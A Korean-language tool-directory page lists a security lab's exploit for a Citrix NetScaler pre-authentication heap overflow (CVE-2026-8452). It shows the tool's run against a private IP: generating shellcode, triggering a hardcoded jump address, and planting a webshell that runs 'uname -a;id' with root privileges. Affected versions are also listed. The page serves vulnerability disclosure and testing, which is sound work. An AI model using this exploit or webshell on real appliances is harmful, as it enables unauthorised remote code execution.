Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
watchTowr-vs-Citrix-Netscaler-PreAuth-RCE-CVE-2026-8452 — CVE-2026-8452 PreAuth RCE | Kitploit
도구/GitHubGitHub/watchtowrlabs/watchtowr-vs-citrix-netscaler-preauth-rce-cve-2026-8452
Vulnerability AnalysisExploitationWeb Application ExploitationRed TeamingShellcode GenerationPayload Development
GitHubwatchtowrlabs/watchtowr-vs-citrix-netscaler-preauth-rce-cve-2026-8452

watchTowr-vs-Citrix-Netscaler-PreAuth-RCE-CVE-2026-8452

CVE-2026-8452 PreAuth RCE

저장소 보기
61151126일 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

watchTowr-vs-Citrix-Netscaler-PreAuth-RCE

Citrix NetScaler CVE-2026-8452용 탐지 아티팩트 생성기

기술적 세부 사항은 블로그 게시물을 참조하세요.

탐지 실행 화면

root@kitploit:~
python3 watchTowr-vs-Citrix-Netscaler-PreAuth-RCE.py --target https://172.16.5.12:9443/
                     __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                          \/          \/     \/

        watchTowr-vs-Citrix-Netscaler-PreAuth-RCE.py

        (*) Citrix NetScaler PreAuth 힙 오버플로우 → RCE 탐지 아티팩트 생성기

          - watchTowr(@watchTowrcyber)의 Sina Kheirkhah(@SinSinology)

        CVEs: [CVE-2026-8452]

[*] 엔드포인트에 연결 중...
[*] 대상 AAA 서비스가 응답함
[*] 셸코드 생성 중
[+] 셸코드 크기: 268바이트
[*] jmp rax를 0x112d30180로 트리거하는 중
[*] 전송됨..
[+] 웹셸 위치: https://172.16.5.12:9443/vpn/theme/x.php?0=uname+-a;id
[+] 웹셸 출력:


FreeBSD something 11.4-NETSCALER-13.1 FreeBSD 11.4-NETSCALER-13.1 #0 ef731ca813f0(heads/artesa_30_52)-dirty: Wed Aug 24 08:24:55 PDT 2022     root@sjc-bld-bsd114-215:/usr/obj/usr/home/build/adc/usr.src/sys/NS64  amd64
uid=65534(nobody) gid=65534(nobody) euid=0(root) egid=0(wheel) groups=0(wheel)
uid=65534(nobody) gid=65534(nobody) euid=0(root) egid=0(wheel) groups=0(wheel)

모든 오프셋/주소는 NetScaler 13.1-30.52 버전용으로 하드코딩되어 있습니다.

영향을 받는 버전

이 취약점은 NetScaler 어플라이언스가 서비스 제공자(SP) 또는 ID 제공자(IdP)로 SAML을 사용하도록 구성된 경우 도달 가능합니다.

Citrix는 다음 버전이 영향을 받는 것으로 명시합니다:

NetScaler ADC 및 NetScaler Gateway 14.1, 14.1-72.61 이전 버전 NetScaler ADC 및 NetScaler Gateway 13.1, 13.1-63.18 이전 버전

watchTowr Labs 팔로우하기

최신 보안 연구를 보려면 watchTowr Labs 팀을 팔로우하세요.

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
도구 다운로드